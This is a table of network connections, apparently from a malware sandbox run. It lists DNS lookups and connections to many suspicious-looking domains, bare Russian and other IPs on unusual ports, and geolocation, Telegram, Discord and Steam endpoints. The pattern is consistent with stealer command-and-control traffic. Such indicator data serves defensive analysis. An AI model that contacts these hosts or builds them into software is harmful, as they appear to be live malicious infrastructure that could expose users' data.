| US | 8.8.8.8:53 | www.srbreferee.com | udp |
| US | 8.8.8.8:53 | 102.193.67.172.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | www.srbreferee.com | udp |
| SE | 93.188.2.53:80 | www.srbreferee.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | ftpcluster.loopia.se | udp |
| SE | 93.188.1.110:21 | ftpcluster.loopia.se | tcp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 88.221.134.137:80 | e5.o.lencr.org | tcp |
| SE | 93.188.1.110:49997 | ftpcluster.loopia.se | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | 53.2.188.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.1.188.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.134.221.88.in-addr.arpa | udp |
| SE | 93.188.1.110:64971 | ftpcluster.loopia.se | tcp |
| SE | 93.188.1.110:59024 | ftpcluster.loopia.se | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| SE | 93.188.1.110:64322 | ftpcluster.loopia.se | tcp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | 167.216.67.172.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| SE | 93.188.1.110:57677 | ftpcluster.loopia.se | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| SE | 93.188.1.110:61844 | ftpcluster.loopia.se | tcp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 64.206.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.238.217.23.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| SE | 93.188.1.110:60992 | ftpcluster.loopia.se | tcp |
| SE | 93.188.1.110:62943 | ftpcluster.loopia.se | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| RU | 178.215.90.34:80 | tcp | |
| RU | 83.217.192.54:22 | tcp | |
| RU | 83.217.192.194:8080 | tcp | |
| RU | 89.169.0.117:80 | tcp | |
| RU | 89.169.7.192:8083 | tcp | |
| RU | 83.217.197.147:80 | tcp | |
| RU | 89.169.1.148:22 | tcp | |
| RU | 83.217.192.194:8080 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 89.169.3.120:554 | tcp | |
| RU | 178.215.90.34:80 | tcp | |
| RU | 89.169.0.161:8001 | tcp | |
| RU | 89.169.6.18:1723 | tcp | |
| RU | 89.169.41.25:8001 | tcp | |
| RU | 89.169.41.148:465 | tcp | |
| RU | 89.169.23.199:21 | tcp | |
| RU | 89.169.2.220:4662 | tcp | |
| RU | 89.169.40.150:8291 | tcp | |
| RU | 213.108.19.30:445 | tcp | |
| RU | 89.169.0.234:8291 | tcp | |
| RU | 83.217.206.25:2000 | tcp | |
| RU | 178.215.76.25:80 | tcp | |
| RU | 178.215.69.100:21 | tcp | |
| RU | 89.169.41.233:139 | tcp | |
| RU | 89.169.41.133:8888 | tcp | |
| RU | 89.169.40.79:3389 | tcp | |
| RU | 178.215.78.66:23 | tcp | |
| RU | 83.217.195.153:179 | tcp | |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.90.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.197.217.83.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | 30.19.108.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.206.217.83.in-addr.arpa | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | 218.172.154.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| RU | 178.215.75.170:80 | tcp | |
| RU | 83.217.206.25:2000 | tcp | |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 54.192.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.75.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| SE | 93.188.1.110:49810 | ftpcluster.loopia.se | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | fightlsoser.click | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 172.67.213.48:443 | fightlsoser.click | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | 48.213.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| CN | 113.45.142.235:8888 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 194.59.30.220:1336 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 162.159.135.234:443 | gateway.discord.gg | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 101.99.92.189:8080 | tcp | |
| US | 8.8.8.8:53 | 189.92.99.101.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mysql682.loopia.se | udp |
| DE | 185.218.125.157:21441 | tcp | |
| SE | 93.188.1.8:3306 | mysql682.loopia.se | tcp |
| RS | 79.101.0.33:3306 | tcp | |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 8.1.188.93.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | ftpcluster.loopia.se | udp |
| US | 8.8.8.8:53 | t.me | udp |
| US | 8.8.8.8:53 | resinedyw.sbs | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | mathcucom.sbs | udp |
| US | 8.8.8.8:53 | allocatinow.sbs | udp |
| US | 8.8.8.8:53 | enlargkiw.sbs | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| SE | 93.188.1.110:21 | ftpcluster.loopia.se | tcp |
| US | 8.8.8.8:53 | vennurviot.sbs | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| SE | 93.188.1.110:52205 | ftpcluster.loopia.se | tcp |
| SE | 93.188.1.110:65250 | ftpcluster.loopia.se | tcp |
| US | 8.8.8.8:53 | ehticsprocw.sbs | udp |
| US | 8.8.8.8:53 | condifendteu.sbs | udp |
| US | 8.8.8.8:53 | drawwyobstacw.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 33.170.124.104.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 104.21.79.7:443 | drive-connect.cyou | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 7.79.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| SE | 93.188.1.110:49576 | ftpcluster.loopia.se | tcp |
| RS | 79.101.0.33:3306 | tcp | |
| US | 8.8.8.8:53 | funletters.net | udp |
| US | 208.122.221.162:80 | funletters.net | tcp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 162.221.122.208.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | mysql679.loopia.se | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| SE | 93.188.1.5:3306 | mysql679.loopia.se | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 5.1.188.93.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| NL | 38.180.123.95:3232 | tcp | |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | a1059592.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | f1043947.xsph.ru | udp |
| RU | 141.8.192.151:80 | f1043947.xsph.ru | tcp |
| US | 8.8.8.8:53 | 151.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1051707.xsph.ru | udp |
| RU | 141.8.192.217:80 | a1051707.xsph.ru | tcp |
| US | 8.8.8.8:53 | www.funletters.net | udp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| US | 8.8.8.8:53 | 217.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | httpbin.org | udp |
| US | 44.206.71.62:443 | httpbin.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| US | 8.8.8.8:53 | acpressions.com | udp |
| FR | 142.250.75.226:80 | pagead2.googlesyndication.com | tcp |
| US | 104.21.77.241:80 | acpressions.com | tcp |
| US | 8.8.8.8:53 | 62.71.206.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| US | 104.21.77.241:443 | acpressions.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 241.77.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.75.250.142.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | a.nel.cloudflare.com | udp |
| US | 154.216.17.90:80 | tcp | |
| US | 8.8.8.8:53 | 227.75.250.142.in-addr.arpa | udp |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | tcp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 35.190.80.1:443 | a.nel.cloudflare.com | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | funletters.net | udp |
| US | 8.8.8.8:53 | smileycons.com | udp |
| US | 8.8.8.8:53 | thundercloud.net | udp |
| US | 8.8.8.8:53 | www.smileycons.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| FR | 216.58.214.66:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 1.80.190.35.in-addr.arpa | udp |
| US | 172.67.213.48:443 | fightlsoser.click | tcp |
| US | 8.8.8.8:53 | 66.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| RU | 176.113.115.19:80 | 176.113.115.19 | tcp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 19.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.speak-a-message.com | udp |
| DE | 195.201.119.163:80 | www.speak-a-message.com | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.119.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | jrqh-hk.com | udp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.25.167:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 22.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.25.5.3.in-addr.arpa | udp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.65.92:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 92.65.42.20.in-addr.arpa | udp |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | login-donor.gl.at.ply.gg | udp |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | thundercloud.net | udp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| US | 8.8.8.8:53 | www.funletters.net | udp |
| FR | 142.250.179.66:443 | ep1.adtrafficquality.google | tcp |
| US | 208.122.221.162:80 | www.funletters.net | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 8.8.8.8:53 | 66.179.250.142.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | updates.signiant.com | udp |
| DE | 13.32.121.30:80 | updates.signiant.com | tcp |
| US | 8.8.8.8:53 | 30.121.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| FR | 142.250.178.129:443 | ep2.adtrafficquality.google | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | www.hootech.com | udp |
| US | 107.191.125.184:80 | www.hootech.com | tcp |
| US | 8.8.8.8:53 | 129.178.250.142.in-addr.arpa | udp |
| FR | 142.250.178.129:443 | ep2.adtrafficquality.google | udp |
| US | 154.216.17.90:80 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| US | 8.8.8.8:53 | portals.mediashuttle.com | udp |
| US | 8.8.8.8:53 | 184.125.191.107.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| US | 8.8.8.8:53 | 251.25.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | caca.vercel.app | udp |
| US | 64.29.17.193:443 | caca.vercel.app | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | 193.17.29.64.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| CN | 183.57.21.131:8095 | tcp | |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| US | 8.8.8.8:53 | 162.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | webcdn.triongames.com | udp |
| US | 8.8.8.8:53 | VIPEEK1990-25013.portmap.host | udp |
| US | 2.21.72.134:80 | webcdn.triongames.com | tcp |
| CN | 123.129.219.191:1582 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | wpurl.wpqh.cc | udp |
| HK | 47.238.194.17:443 | wpurl.wpqh.cc | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 87.120.84.32:80 | 87.120.84.32 | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 147.68.81.185.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 17.194.238.47.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.84.120.87.in-addr.arpa | udp |
| US | 20.83.148.22:80 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | 72.23.230.195.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| RU | 185.81.68.147:1912 | tcp | |
| US | 8.8.8.8:53 | download.microsoft.com | udp |
| SE | 2.21.189.207:80 | download.microsoft.com | tcp |
| US | 8.8.8.8:53 | 207.189.21.2.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 147.185.221.23:58963 | login-donor.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | home.fvtekx5vs.top | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| FR | 142.250.178.129:443 | ep2.adtrafficquality.google | tcp |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| FR | 142.250.178.129:443 | ep2.adtrafficquality.google | tcp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| SE | 2.21.189.207:443 | download.microsoft.com | tcp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 104.26.0.100:443 | get.geojs.io | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 100.0.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.113.215.185.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 94.156.177.133:7000 | tcp | |
| US | 8.8.8.8:53 | 133.177.156.94.in-addr.arpa | udp |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 154.216.17.90:80 | tcp | |
| NL | 38.180.123.95:3232 | tcp | |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| SE | 2.21.189.207:80 | download.microsoft.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| SE | 2.21.189.207:443 | download.microsoft.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| CN | 47.92.192.119:8443 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | VIPEEK1990-25013.portmap.host | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | claywyaeropumps.com | udp |
| DE | 185.218.125.157:21441 | tcp | |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
